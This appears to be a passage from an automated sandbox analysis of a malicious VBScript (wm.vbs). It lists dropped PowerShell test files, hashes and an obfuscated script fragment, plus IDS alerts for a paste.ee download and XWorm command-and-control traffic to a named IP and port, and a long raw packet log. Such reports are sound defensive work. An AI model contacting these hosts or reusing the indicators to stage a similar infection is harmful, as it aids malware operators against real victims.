                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gzir100f.000.psm1

                                            Download File
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hvt5xcbe.zaw.psm1

                                            Download File
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_r4m4ivmb.eje.psm1

                                            Download File
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zlwxi0ma.lev.ps1

                                            Download File
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                            Static File Info

                                            General

                                            File type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                            Entropy (8bit):3.740796132518701
                                            TrID:
                                            • Text - UTF-16 (LE) encoded (2002/1) 64.44%
                                            • MP3 audio (1001/1) 32.22%
                                            • Lumena CEL bitmap (63/63) 2.03%
                                            • Corel Photo Paint (41/41) 1.32%
                                            File name:wm.vbs
                                            File size:515'028 bytes
                                            MD5:9925d6b112cc586b4c53b9ec22ac9ee3
                                            SHA1:d3a6302d2d70999036849a9cf046ee868ba78427
                                            SHA256:c7d27223d3eeb698eeea7eac9681158f66c0091f5fc2e8ec95c979f324227373
                                            SHA512:271479f0a7b313e734cc06c26932e101b75bcc4dd0bb7c1344b0e7a888bf1d8d67289639471eb27ed643807820ecb98c621d319d35c31e8c25ba475d2056997d
                                            SSDEEP:12288:ElKHt8mQeE9b9xefCRexf049pZBJN7ZnU5AuK337QpGAgHigiHETJc:xZxDEqql
                                            TLSH:23B4E91135EA7048F1F32FA35AE965E94FBBB9662A36911E7048070F4793E80CE51B73
                                            File Content Preview:..........m.i.U.H.Z.l.u.t.k.m.N.R.q.L.K.Z.o.m.c.K.m.p.o.c.L.l.o.e.L.c.O.W.p.k.k.W.W.m.J.k.h.P.G.Z.h.L.W.a.W.k.A.G.f.k.P.k.k.u.o.L.Z.c.L.N.W.k.i.t. .=. .".G.l.U.i.K.q.W.U.W.G.e.K.K.W.k.b.W.K.W.W.I.A.e.U.R.O.a.q.P.G.O.a.p.t.W.W.Z.n.G.K.h.b.u.i.W.O.c.L.W.l.e

                                            File Icon

                                            Icon Hash:68d69b8f86ab9a86

                                            Network Behavior

                                            Suricata IDS Alerts

                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                            2024-09-25T15:26:33.237775+02002841075ETPRO MALWARE Terse Request to paste .ee - Possible Download1192.168.2.949708188.114.96.3443TCP
                                            2024-09-25T15:26:33.410263+02002020424ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 2 M11188.114.96.3443192.168.2.949708TCP
                                            2024-09-25T15:26:48.914993+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1135.224.23.1135555192.168.2.949709TCP
                                            2024-09-25T15:26:48.914993+02002852874ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M21135.224.23.1135555192.168.2.949709TCP
                                            2024-09-25T15:26:56.221499+02002855924ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound1192.168.2.949709135.224.23.1135555TCP
                                            2024-09-25T15:26:56.345954+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1135.224.23.1135555192.168.2.949709TCP
                                            2024-09-25T15:26:56.348028+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.949709135.224.23.1135555TCP
                                            2024-09-25T15:27:08.886340+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1135.224.23.1135555192.168.2.949709TCP
                                            2024-09-25T15:27:08.917549+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.949709135.224.23.1135555TCP
                                            2024-09-25T15:27:09.216652+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.949709135.224.23.1135555TCP
                                            2024-09-25T15:27:09.826591+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.949709135.224.23.1135555TCP
                                            2024-09-25T15:27:09.959923+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1135.224.23.1135555192.168.2.949709TCP
                                            2024-09-25T15:27:09.960553+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1135.224.23.1135555192.168.2.949709TCP
                                            2024-09-25T15:27:09.961307+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1135.224.23.1135555192.168.2.949709TCP
                                            2024-09-25T15:27:18.905785+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1135.224.23.1135555192.168.2.949709TCP
                                            2024-09-25T15:27:18.905785+02002852874ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M21135.224.23.1135555192.168.2.949709TCP
                                            2024-09-25T15:27:21.030073+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1135.224.23.1135555192.168.2.949709TCP
                                            2024-09-25T15:27:21.031646+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.949709135.224.23.1135555TCP
                                            2024-09-25T15:27:33.542279+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1135.224.23.1135555192.168.2.949709TCP
                                            2024-09-25T15:27:33.562566+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.949709135.224.23.1135555TCP
                                            2024-09-25T15:27:45.733239+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1135.224.23.1135555192.168.2.949709TCP
                                            2024-09-25T15:27:45.737886+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.949709135.224.23.1135555TCP
                                            2024-09-25T15:27:46.497478+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1135.224.23.1135555192.168.2.949709TCP
                                            2024-09-25T15:27:46.499555+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.949709135.224.23.1135555TCP
                                            2024-09-25T15:27:48.920023+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1135.224.23.1135555192.168.2.949709TCP
                                            2024-09-25T15:27:48.920023+02002852874ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M21135.224.23.1135555192.168.2.949709TCP
                                            2024-09-25T15:27:52.076093+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1135.224.23.1135555192.168.2.949709TCP
                                            2024-09-25T15:27:52.082476+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.949709135.224.23.1135555TCP
                                            2024-09-25T15:28:02.892902+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1135.224.23.1135555192.168.2.949709TCP
                                            2024-09-25T15:28:02.894697+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.949709135.224.23.1135555TCP
                                            2024-09-25T15:28:14.326148+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1135.224.23.1135555192.168.2.949709TCP
                                            2024-09-25T15:28:14.326621+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1135.224.23.1135555192.168.2.949709TCP
                                            2024-09-25T15:28:14.327132+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.949709135.224.23.1135555TCP

                                            Network Port Distribution

                                            TCP Packets

                                            TimestampSource PortDest PortSource IPDest IP
                                            Sep 25, 2024 15:26:21.727787971 CEST49707443192.168.2.9207.241.227.240
                                            Sep 25, 2024 15:26:21.727844954 CEST44349707207.241.227.240192.168.2.9
                                            Sep 25, 2024 15:26:21.727911949 CEST49707443192.168.2.9207.241.227.240
                                            Sep 25, 2024 15:26:21.737657070 CEST49707443192.168.2.9207.241.227.240
                                            Sep 25, 2024 15:26:21.737689972 CEST44349707207.241.227.240192.168.2.9
                                            Sep 25, 2024 15:26:22.518006086 CEST44349707207.241.227.240192.168.2.9
                                            Sep 25, 2024 15:26:22.518090010 CEST49707443192.168.2.9207.241.227.240
                                            Sep 25, 2024 15:26:22.521954060 CEST49707443192.168.2.9207.241.227.240
                                            Sep 25, 2024 15:26:22.521976948 CEST44349707207.241.227.240192.168.2.9
                                            Sep 25, 2024 15:26:22.522420883 CEST44349707207.241.227.240192.168.2.9
                                            Sep 25, 2024 15:26:22.530569077 CEST49707443192.168.2.9207.241.227.240
                                            Sep 25, 2024 15:26:22.575407982 CEST44349707207.241.227.240192.168.2.9
                                            Sep 25, 2024 15:26:22.852732897 CEST44349707207.241.227.240192.168.2.9
                                            Sep 25, 2024 15:26:22.852772951 CEST44349707207.241.227.240192.168.2.9
                                            Sep 25, 2024 15:26:22.852808952 CEST44349707207.241.227.240192.168.2.9
                                            Sep 25, 2024 15:26:22.852989912 CEST49707443192.168.2.9207.241.227.240
                                            Sep 25, 2024 15:26:22.853025913 CEST44349707207.241.227.240192.168.2.9
                                            Sep 25, 2024 15:26:22.853090048 CEST49707443192.168.2.9207.241.227.240
                                            Sep 25, 2024 15:26:22.905697107 CEST44349707207.241.227.240192.168.2.9
                                            Sep 25, 2024 15:26:22.905725956 CEST44349707207.241.227.240192.168.2.9
                                            Sep 25, 2024 15:26:22.905846119 CEST49707443192.168.2.9207.241.227.240
                                            Sep 25, 2024 15:26:22.905858040 CEST44349707207.241.227.240192.168.2.9
                                            Sep 25, 2024 15:26:22.905900002 CEST49707443192.168.2.9207.241.227.240
                                            Sep 25, 2024 15:26:23.063558102 CEST44349707207.241.227.240192.168.2.9
                                            Sep 25, 2024 15:26:23.063590050 CEST44349707207.241.227.240192.168.2.9
                                            Sep 25, 2024 15:26:23.063688993 CEST49707443192.168.2.9207.241.227.240
                                            Sep 25, 2024 15:26:23.063746929 CEST44349707207.241.227.240192.168.2.9
                                            Sep 25, 2024 15:26:23.063769102 CEST49707443192.168.2.9207.241.227.240
                                            Sep 25, 2024 15:26:23.063811064 CEST49707443192.168.2.9207.241.227.240
                                            Sep 25, 2024 15:26:23.103521109 CEST44349707207.241.227.240192.168.2.9
                                            Sep 25, 2024 15:26:23.103554964 CEST44349707207.241.227.240192.168.2.9
                                            Sep 25, 2024 15:26:23.103751898 CEST49707443192.168.2.9207.241.227.240
                                            Sep 25, 2024 15:26:23.103796959 CEST44349707207.241.227.240192.168.2.9
                                            Sep 25, 2024 15:26:23.103914022 CEST49707443192.168.2.9207.241.227.240
                                            Sep 25, 2024 15:26:23.168548107 CEST44349707207.241.227.240192.168.2.9
                                            Sep 25, 2024 15:26:23.168571949 CEST44349707207.241.227.240192.168.2.9
                                            Sep 25, 2024 15:26:23.168699026 CEST49707443192.168.2.9207.241.227.240
                                            Sep 25, 2024 15:26:23.168730021 CEST44349707207.241.227.240192.168.2.9
                                            Sep 25, 2024 15:26:23.168797016 CEST49707443192.168.2.9207.241.227.240
                                            Sep 25, 2024 15:26:23.238240957 CEST44349707207.241.227.240192.168.2.9
                                            Sep 25, 2024 15:26:23.238270044 CEST44349707207.241.227.240192.168.2.9
                                            Sep 25, 2024 15:26:23.238421917 CEST49707443192.168.2.9207.241.227.240
                                            Sep 25, 2024 15:26:23.238461018 CEST44349707207.241.227.240192.168.2.9
                                            Sep 25, 2024 15:26:23.238535881 CEST49707443192.168.2.9207.241.227.240
                                            Sep 25, 2024 15:26:23.345319033 CEST44349707207.241.227.240192.168.2.9
                                            Sep 25, 2024 15:26:23.345341921 CEST44349707207.241.227.240192.168.2.9
                                            Sep 25, 2024 15:26:23.345402002 CEST49707443192.168.2.9207.241.227.240
                                            Sep 25, 2024 15:26:23.345416069 CEST44349707207.241.227.240192.168.2.9
                                            Sep 25, 2024 15:26:23.345454931 CEST49707443192.168.2.9207.241.227.240
                                            Sep 25, 2024 15:26:23.345473051 CEST49707443192.168.2.9207.241.227.240
                                            Sep 25, 2024 15:26:23.390146971 CEST44349707207.241.227.240192.168.2.9
                                            Sep 25, 2024 15:26:23.390165091 CEST44349707207.241.227.240192.168.2.9
                                            Sep 25, 2024 15:26:23.390221119 CEST49707443192.168.2.9207.241.227.240
                                            Sep 25, 2024 15:26:23.390232086 CEST44349707207.241.227.240192.168.2.9
                                            Sep 25, 2024 15:26:23.390273094 CEST49707443192.168.2.9207.241.227.240
                                            Sep 25, 2024 15:26:23.390285969 CEST49707443192.168.2.9207.241.227.240
                                            Sep 25, 2024 15:26:23.442797899 CEST44349707207.241.227.240192.168.2.9
                                            Sep 25, 2024 15:26:23.442837954 CEST44349707207.241.227.240192.168.2.9
                                            Sep 25, 2024 15:26:23.443051100 CEST49707443192.168.2.9207.241.227.240
                                            Sep 25, 2024 15:26:23.443072081 CEST44349707207.241.227.240192.168.2.9
                                            Sep 25, 2024 15:26:23.443121910 CEST49707443192.168.2.9207.241.227.240
                                            Sep 25, 2024 15:26:23.543469906 CEST44349707207.241.227.240192.168.2.9
                                            Sep 25, 2024 15:26:23.543504953 CEST44349707207.241.227.240192.168.2.9
                                            Sep 25, 2024 15:26:23.543567896 CEST49707443192.168.2.9207.241.227.240
                                            Sep 25, 2024 15:26:23.543591022 CEST44349707207.241.227.240192.168.2.9
                                            Sep 25, 2024 15:26:23.543601036 CEST49707443192.168.2.9207.241.227.240
                                            Sep 25, 2024 15:26:23.543647051 CEST49707443192.168.2.9207.241.227.240
                                            Sep 25, 2024 15:26:23.606905937 CEST44349707207.241.227.240192.168.2.9
                                            Sep 25, 2024 15:26:23.606933117 CEST44349707207.241.227.240192.168.2.9
                                            Sep 25, 2024 15:26:23.607042074 CEST49707443192.168.2.9207.241.227.240
                                            Sep 25, 2024 15:26:23.607063055 CEST44349707207.241.227.240192.168.2.9
                                            Sep 25, 2024 15:26:23.607127905 CEST49707443192.168.2.9207.241.227.240
                                            Sep 25, 2024 15:26:23.648113966 CEST44349707207.241.227.240192.168.2.9
                                            Sep 25, 2024 15:26:23.648144007 CEST44349707207.241.227.240192.168.2.9
                                            Sep 25, 2024 15:26:23.648277044 CEST49707443192.168.2.9207.241.227.240
                                            Sep 25, 2024 15:26:23.648302078 CEST44349707207.241.227.240192.168.2.9
                                            Sep 25, 2024 15:26:23.648350000 CEST49707443192.168.2.9207.241.227.240
                                            Sep 25, 2024 15:26:23.737786055 CEST44349707207.241.227.240192.168.2.9
                                            Sep 25, 2024 15:26:23.737812042 CEST44349707207.241.227.240192.168.2.9
                                            Sep 25, 2024 15:26:23.737989902 CEST49707443192.168.2.9207.241.227.240
                                            Sep 25, 2024 15:26:23.738065958 CEST44349707207.241.227.240192.168.2.9
                                            Sep 25, 2024 15:26:23.738153934 CEST49707443192.168.2.9207.241.227.240
                                            Sep 25, 2024 15:26:23.854228973 CEST44349707207.241.227.240192.168.2.9
                                            Sep 25, 2024 15:26:23.854260921 CEST44349707207.241.227.240192.168.2.9
                                            Sep 25, 2024 15:26:23.854433060 CEST49707443192.168.2.9207.241.227.240
                                            Sep 25, 2024 15:26:23.854454994 CEST44349707207.241.227.240192.168.2.9
                                            Sep 25, 2024 15:26:23.854511023 CEST49707443192.168.2.9207.241.227.240
                                            Sep 25, 2024 15:26:23.859827042 CEST44349707207.241.227.240192.168.2.9
                                            Sep 25, 2024 15:26:23.859853983 CEST44349707207.241.227.240192.168.2.9
                                            Sep 25, 2024 15:26:23.859994888 CEST49707443192.168.2.9207.241.227.240
                                            Sep 25, 2024 15:26:23.860001087 CEST44349707207.241.227.240192.168.2.9
                                            Sep 25, 2024 15:26:23.860095978 CEST49707443192.168.2.9207.241.227.240
                                            Sep 25, 2024 15:26:23.962829113 CEST44349707207.241.227.240192.168.2.9
                                            Sep 25, 2024 15:26:23.962856054 CEST44349707207.241.227.240192.168.2.9
                                            Sep 25, 2024 15:26:23.963068962 CEST49707443192.168.2.9207.241.227.240
                                            Sep 25, 2024 15:26:23.963104963 CEST44349707207.241.227.240192.168.2.9
                                            Sep 25, 2024 15:26:23.963181019 CEST49707443192.168.2.9207.241.227.240
                                            Sep 25, 2024 15:26:24.039020061 CEST44349707207.241.227.240192.168.2.9
                                            Sep 25, 2024 15:26:24.039042950 CEST44349707207.241.227.240192.168.2.9
                                            Sep 25, 2024 15:26:24.039100885 CEST49707443192.168.2.9207.241.227.240
                                            Sep 25, 2024 15:26:24.039149046 CEST44349707207.241.227.240192.168.2.9
                                            Sep 25, 2024 15:26:24.039175034 CEST49707443192.168.2.9207.241.227.240
                                            Sep 25, 2024 15:26:24.039200068 CEST49707443192.168.2.9207.241.227.240
                                            Sep 25, 2024 15:26:24.208882093 CEST44349707207.241.227.240192.168.2.9
                                            Sep 25, 2024 15:26:24.208936930 CEST44349707207.241.227.240192.168.2.9
                                            Sep 25, 2024 15:26:24.209019899 CEST49707443192.168.2.9207.241.227.240
                                            Sep 25, 2024 15:26:24.209048033 CEST44349707207.241.227.240192.168.2.9
                                            Sep 25, 2024 15:26:24.209069014 CEST49707443192.168.2.9207.241.227.240
                                            Sep 25, 2024 15:26:24.209089041 CEST49707443192.168.2.9207.241.227.240
                                            Sep 25, 2024 15:26:24.211457968 CEST44349707207.241.227.240192.168.2.9
                                            Sep 25, 2024 15:26:24.211482048 CEST44349707207.241.227.240192.168.2.9
                                            Sep 25, 2024 15:26:24.211546898 CEST49707443192.168.2.9207.241.227.240
                                            Sep 25, 2024 15:26:24.211551905 CEST44349707207.241.227.240192.168.2.9
                                            Sep 25, 2024 15:26:24.211577892 CEST49707443192.168.2.9207.241.227.240
                                            Sep 25, 2024 15:26:24.211595058 CEST49707443192.168.2.9207.241.227.240
                                            Sep 25, 2024 15:26:24.314390898 CEST44349707207.241.227.240192.168.2.9
                                            Sep 25, 2024 15:26:24.314423084 CEST44349707207.241.227.240192.168.2.9
                                            Sep 25, 2024 15:26:24.314516068 CEST49707443192.168.2.9207.241.227.240
                                            Sep 25, 2024 15:26:24.314594030 CEST44349707207.241.227.240192.168.2.9
                                            Sep 25, 2024 15:26:24.314634085 CEST49707443192.168.2.9207.241.227.240
                                            Sep 25, 2024 15:26:24.314659119 CEST49707443192.168.2.9207.241.227.240
                                            Sep 25, 2024 15:26:24.438810110 CEST44349707207.241.227.240192.168.2.9
                                            Sep 25, 2024 15:26:24.438843966 CEST44349707207.241.227.240192.168.2.9
                                            Sep 25, 2024 15:26:24.438903093 CEST49707443192.168.2.9207.241.227.240
                                            Sep 25, 2024 15:26:24.438934088 CEST44349707207.241.227.240192.168.2.9
                                            Sep 25, 2024 15:26:24.438952923 CEST49707443192.168.2.9207.241.227.240
                                            Sep 25, 2024 15:26:24.438971996 CEST49707443192.168.2.9207.241.227.240
                                            Sep 25, 2024 15:26:24.489847898 CEST44349707207.241.227.240192.168.2.9
                                            Sep 25, 2024 15:26:24.489876986 CEST44349707207.241.227.240192.168.2.9
                                            Sep 25, 2024 15:26:24.489995956 CEST49707443192.168.2.9207.241.227.240
                                            Sep 25, 2024 15:26:24.490026951 CEST44349707207.241.227.240192.168.2.9
                                            Sep 25, 2024 15:26:24.490071058 CEST49707443192.168.2.9207.241.227.240
                                            Sep 25, 2024 15:26:24.614308119 CEST44349707207.241.227.240192.168.2.9
                                            Sep 25, 2024 15:26:24.614335060 CEST44349707207.241.227.240192.168.2.9
                                            Sep 25, 2024 15:26:24.614398003 CEST49707443192.168.2.9207.241.227.240
                                            Sep 25, 2024 15:26:24.614474058 CEST44349707207.241.227.240192.168.2.9
                                            Sep 25, 2024 15:26:24.614537954 CEST49707443192.168.2.9207.241.227.240
                                            Sep 25, 2024 15:26:24.614537954 CEST49707443192.168.2.9207.241.227.240
                                            Sep 25, 2024 15:26:24.695231915 CEST44349707207.241.227.240192.168.2.9
                                            Sep 25, 2024 15:26:24.695266962 CEST44349707207.241.227.240192.168.2.9
                                            Sep 25, 2024 15:26:24.695313931 CEST49707443192.168.2.9207.241.227.240
                                            Sep 25, 2024 15:26:24.695348978 CEST49707443192.168.2.9207.241.227.240
                                            Sep 25, 2024 15:26:24.695365906 CEST44349707207.241.227.240192.168.2.9
                                            Sep 25, 2024 15:26:24.695430040 CEST49707443192.168.2.9207.241.227.240
                                            Sep 25, 2024 15:26:24.767776966 CEST44349707207.241.227.240192.168.2.9
                                            Sep 25, 2024 15:26:24.767797947 CEST44349707207.241.227.240192.168.2.9
                                            Sep 25, 2024 15:26:24.767899036 CEST49707443192.168.2.9207.241.227.240
                                            Sep 25, 2024 15:26:24.767908096 CEST44349707207.241.227.240192.168.2.9
                                            Sep 25, 2024 15:26:24.767959118 CEST49707443192.168.2.9207.241.227.240
                                            Sep 25, 2024 15:26:24.864979029 CEST44349707207.241.227.240192.168.2.9
                                            Sep 25, 2024 15:26:24.865009069 CEST44349707207.241.227.240192.168.2.9
                                            Sep 25, 2024 15:26:24.865134001 CEST49707443192.168.2.9207.241.227.240
                                            Sep 25, 2024 15:26:24.865158081 CEST44349707207.241.227.240192.168.2.9
                                            Sep 25, 2024 15:26:24.865194082 CEST49707443192.168.2.9207.241.227.240
                                            Sep 25, 2024 15:26:25.946888924 CEST44349707207.241.227.240192.168.2.9
                                            Sep 25, 2024 15:26:25.946907997 CEST44349707207.241.227.240192.168.2.9
                                            Sep 25, 2024 15:26:25.946986914 CEST44349707207.241.227.240192.168.2.9
                                            Sep 25, 2024 15:26:25.947052956 CEST49707443192.168.2.9207.241.227.240
                                            Sep 25, 2024 15:26:25.947078943 CEST44349707207.241.227.240192.168.2.9
                                            Sep 25, 2024 15:26:25.947108030 CEST49707443192.168.2.9207.241.227.240
                                            Sep 25, 2024 15:26:25.947132111 CEST49707443192.168.2.9207.241.227.240
                                            Sep 25, 2024 15:26:26.027934074 CEST44349707207.241.227.240192.168.2.9
                                            Sep 25, 2024 15:26:26.027966976 CEST44349707207.241.227.240192.168.2.9
                                            Sep 25, 2024 15:26:26.028107882 CEST49707443192.168.2.9207.241.227.240
                                            Sep 25, 2024 15:26:26.028150082 CEST44349707207.241.227.240192.168.2.9
                                            Sep 25, 2024 15:26:26.028295040 CEST49707443192.168.2.9207.241.227.240
                                            Sep 25, 2024 15:26:26.035192013 CEST44349707207.241.227.240192.168.2.9
                                            Sep 25, 2024 15:26:26.035218954 CEST44349707207.241.227.240192.168.2.9
                                            Sep 25, 2024 15:26:26.035279036 CEST49707443192.168.2.9207.241.227.240
                                            Sep 25, 2024 15:26:26.035288095 CEST44349707207.241.227.240192.168.2.9
                                            Sep 25, 2024 15:26:26.035303116 CEST49707443192.168.2.9207.241.227.240
                                            Sep 25, 2024 15:26:26.035332918 CEST49707443192.168.2.9207.241.227.240
                                            Sep 25, 2024 15:26:26.039675951 CEST44349707207.241.227.240192.168.2.9
                                            Sep 25, 2024 15:26:26.039710999 CEST44349707207.241.227.240192.168.2.9
                                            Sep 25, 2024 15:26:26.039762974 CEST49707443192.168.2.9207.241.227.240
                                            Sep 25, 2024 15:26:26.039771080 CEST44349707207.241.227.240192.168.2.9
                                            Sep 25, 2024 15:26:26.039783001 CEST49707443192.168.2.9207.241.227.240
                                            Sep 25, 2024 15:26:26.039813042 CEST49707443192.168.2.9207.241.227.240
                                            Sep 25, 2024 15:26:26.265213013 CEST44349707207.241.227.240192.168.2.9
                                            Sep 25, 2024 15:26:26.265222073 CEST44349707207.241.227.240192.168.2.9
                                            Sep 25, 2024 15:26:26.265284061 CEST44349707207.241.227.240192.168.2.9
                                            Sep 25, 2024 15:26:26.265322924 CEST49707443192.168.2.9207.241.227.240
                                            Sep 25, 2024 15:26:26.265343904 CEST44349707207.241.227.240192.168.2.9
                                            Sep 25, 2024 15:26:26.265374899 CEST49707443192.168.2.9207.241.227.240
                                            Sep 25, 2024 15:26:26.265393972 CEST49707443192.168.2.9207.241.227.240
                                            Sep 25, 2024 15:26:26.268543005 CEST44349707207.241.227.240192.168.2.9
                                            Sep 25, 2024 15:26:26.268549919 CEST44349707207.241.227.240192.168.2.9
                                            Sep 25, 2024 15:26:26.268634081 CEST49707443192.168.2.9207.241.227.240
                                            Sep 25, 2024 15:26:26.268642902 CEST44349707207.241.227.240192.168.2.9
                                            Sep 25, 2024 15:26:26.268687963 CEST49707443192.168.2.9207.241.227.240
                                            Sep 25, 2024 15:26:26.336432934 CEST44349707207.241.227.240192.168.2.9
                                            Sep 25, 2024 15:26:26.336489916 CEST44349707207.241.227.240192.168.2.9
                                            Sep 25, 2024 15:26:26.336601973 CEST49707443192.168.2.9207.241.227.240
                                            Sep 25, 2024 15:26:26.336631060 CEST44349707207.241.227.240192.168.2.9
                                            Sep 25, 2024 15:26:26.336651087 CEST49707443192.168.2.9207.241.227.240
                                            Sep 25, 2024 15:26:26.336704969 CEST49707443192.168.2.9207.241.227.240
                                            Sep 25, 2024 15:26:26.377146959 CEST44349707207.241.227.240192.168.2.9
                                            Sep 25, 2024 15:26:26.377211094 CEST44349707207.241.227.240192.168.2.9
                                            Sep 25, 2024 15:26:26.377242088 CEST49707443192.168.2.9207.241.227.240
                                            Sep 25, 2024 15:26:26.377270937 CEST44349707207.241.227.240192.168.2.9
                                            Sep 25, 2024 15:26:26.377279043 CEST49707443192.168.2.9207.241.227.240
                                            Sep 25, 2024 15:26:26.377315044 CEST49707443192.168.2.9207.241.227.240
                                            Sep 25, 2024 15:26:26.397945881 CEST44349707207.241.227.240192.168.2.9
                                            Sep 25, 2024 15:26:26.397964954 CEST44349707207.241.227.240192.168.2.9
                                            Sep 25, 2024 15:26:26.398252964 CEST49707443192.168.2.9207.241.227.240
                                            Sep 25, 2024 15:26:26.398267031 CEST44349707207.241.227.240192.168.2.9
                                            Sep 25, 2024 15:26:26.398324013 CEST49707443192.168.2.9207.241.227.240
                                            Sep 25, 2024 15:26:26.465675116 CEST44349707207.241.227.240192.168.2.9
